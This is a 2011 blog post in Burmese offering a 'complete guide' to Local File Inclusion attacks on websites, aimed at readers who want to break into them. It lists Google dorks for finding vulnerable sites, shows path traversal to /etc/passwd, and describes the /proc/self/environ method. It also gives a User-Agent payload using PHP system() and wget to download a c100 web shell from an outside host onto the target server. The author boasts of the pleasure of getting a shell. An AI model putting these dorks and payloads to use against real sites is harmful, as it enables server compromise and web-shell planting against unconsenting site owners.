Pages

Pages - Menu

Saturday, December 10, 2011

Local File Inclusion (LFI Attack) : COMPLETE GUIDE!!

LFI Local File Inclusion ေလး အေၾကာင္းေျပာခ်င္ပါတယ္ ညီကိုတို႔.... Online မွာ LFI ေပါက္ေနတဲ့ဆိုက္ေတြ သန္းခ်ီပီးရွိေနပါတယ္.... Web Hacking ေတြထဲကမွ ကၽြန္ေတာ္ အရသာအေတြ႔ဆံုးေလးပါ.... ဟီးဟီး... ဟဘာလို႔ အရသာေတြ႔တာလဲကြ... လို႔ေမးစရာျဖစ္ေတာ့မယ္.... ေျပာျပပါမယ္....

Web Hacking မွာ နံမယ္ႀကီးတာေတာ့

XSS (Cross Site Scripting)
နံမယ္ကေတာ့ လွတယ္.... ခက္တာလား ရွားတာလားေတာ့ မေသခ်ာဘူး... ေတြ႔ရခဲတယ္ ခင္ဗ်.... ေတာ္ေတာ္ ဆရာက်တဲ့ ဟက္ကာေတြ လုပ္ထားတဲ့ XSS ေတာ့ ေတြ႔ဖူးပါတယ္.... ေနာက္မွ ပို႔စ္ အသစ္တင္ေပးဦးမယ္...

SQLi (SQL Injection Attack)
ကေလးေတာင္ လုပ္တတ္တယ္ခင္ဗ်ာ..... Havij လို GUI tool မ်ိဳးနဲ႔ ထိုင္လုပ္ ေနၾကပါတယ္.... MD5/Admin Page ေတြ မွာတစ္ေနတာလဲ အမ်ားႀကီး... ဟီး.... သူ႔ကိုလဲ အထင္ေသးလို႔ေတာ့မရပါဘူး ခင္ဗ်ာ... တကယ့္ဆရာက်တဲ့ နည္းလမ္းေတြရွိေသးတာေပါ့.... Havij နဲ႔လုပ္တာေလာက္ကေတာ့ Basic ေပါ့ဗ်ာ... Back Track လို OS ေတြနဲ႔ေပါ့...
ထားပါ.... အဲ့ေလာက္ မတတ္ေသးဘူး.... ဟီးဟီးဟီး....

RFI/LFI အဲ.... လာပါပီ... ေျပာခ်င္တာေလး လာပါပီ.....

ြRFI ေပါက္တယ္ဆိုတာ ရွားပါတယ္.... LFI ေပါက္တာကေတာ့ SQLI နီးနီးပါပဲ....

RFI မွာ SHELL တင္စရာမလိုပါဘူး.... LFI မွာ SHELL တင္ရတာ အရသာရွိပါတယ္.... web hacker တေယာက္အတြက္အရသာဟာ SHELL တင္တဲ့ေနရာမွာပဲရွိတာလို႔ထင္ပါတယ္.... မရမက SHELL တင္ပီး SHELL Window ႀကီမ်ား တက္လာလို႔ကေတာ့ ေပ်ာ္လိုက္တဲ့ ျဖစ္ခ်င္း....
RFI ေတြ႔ခဲ့တယ္ဆိုရင္ေတာင္ CHMOD 777 ရခဲပါတယ္... LFI ကေတာ့ SHELL Access ျဖစ္ပီေဟ့ဆိုတာနဲ႔ CHMOD 777 ကေသခ်ာသေလာက္ပါပဲ... ဆိုေတာ့ လုပ္ခ်င္တာသာလုပ္ေတာ့ပဲ..... ဟီး.....

ကဲကဲ စကားေတြမမ်ားေတာ့ဘူး..... စၾကမယ္ LFI


GOOGLE DORK FOR LFI
-----------------------------
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=

အဲ့ဒီ Dork ေလးေတြနဲ႔ google မွာရွာၾကည့္ပါ..... ကၽြန္ေတာ္ တခုေရြးလိုက္ပါမယ္... ေအာက္မွာၾကည့္ပါ



ေရြးထားတဲ့ လင့္ကို သြားပါမယ္.....



ပံုမွာျပထားတဲ့ php file ေနရာမွာ ../../etc/passwd ကိုအစားထိုးၾကည့္ပါ...



အဲပံုမွာေတြ႔ရသလို root:root စတာေတြက်လာတာေတြ႔ရင္ေတာ့ ေသခ်ာပီ LFI ေပါက္ေနပါပီ.... ကၽြန္ေတာ္တို႔ SHELL တင္ႏိုင္ဖို႔..... /proc/self/environ ဆိုတဲ့ method ဖြင့္ထားလားဆိုတာ စစ္ၾကည့္ရပါမယ္.... /etc/passwd ေနရာမွာ /proc/self/environ ဆိုတာ အစားထိုးထည့္ၾကည့္ပါ..... ေအာက္ကလို DOCUMENT_ROOT ေအာက္ေရာက္သြားပီဆိုရင္ေတာ့ Shell တင္လို႔ရပါပီ....



SHELL တင္ဖို႔တြက္ ကၽြန္ေတာ္တို႔ Tamper Data Addon (or) User Agent Switcher ကိုသံုးရပါမယ္.... ခုေတာ့ Tamperdata Addon နဲ႔ျပပါမယ္.....



ကၽြန္ေတာ္တို႔ Tamper ကို start လုပ္ပီး page ကို reload လုပ္လိုက္ရင္ ေအာက္ကပံုေတြလို အဆင့္ဆင့္ က်လာပါမယ္....



ပီးရင္ေတာ့ User Agent ဆိုတဲ့ေနရာမွာ ရွိတဲ့စာေတြဖ်က္ပီး Command ေလးတေၾကာင္းထည့္ရပါမယ္ဗ်ား......

<? system('wget http://site.com/shell.txt -O shell.php'); ?>

အဲ့ဒါကေတာ့ သူ႔ Logic ေပါ့ဗ်ာ.... ကၽြန္ေတာ္ရွာထားပီးသား .txt shell က
http://www.sh3ll.org/c100.txt


ဆိုေတာ့.. ေအာက္ကလို ထည့္လိုက္ပါ....
<? system('wget http://www.sh3ll.org/c100.txt -O c.php'); ?>

ပီးရင္ ok ႏွိပ္.... အဲ... အကုန္အဆင္ေျပရင္ေတာ့ ခင္ဗ်ား shell က...
http://target.com/shell.php ကၽြန္ေတာ္ျပထားတာဆိုရင္ေတာ့ c.php ေပါ့ဗ်ာ.... အဲ့ခ်ိန္မွာ ရလိုက္တဲ့ အရသာေလး.. လုပ္ၾကည့္ပီးေျပာဦး.... ဟတ္ဟတ္ဟတ္ဟတ္......




Deface မလုပ္ၾကပါနဲ႔..... Deface လုပ္လိုက္ရင္ ေနာက္ေလ့လာသူေတြ လုပ္မရပဲေနမယ္... ခုပံုထဲက ဆိုက္ကိုေျပာတာပါ......

No comments:

Post a Comment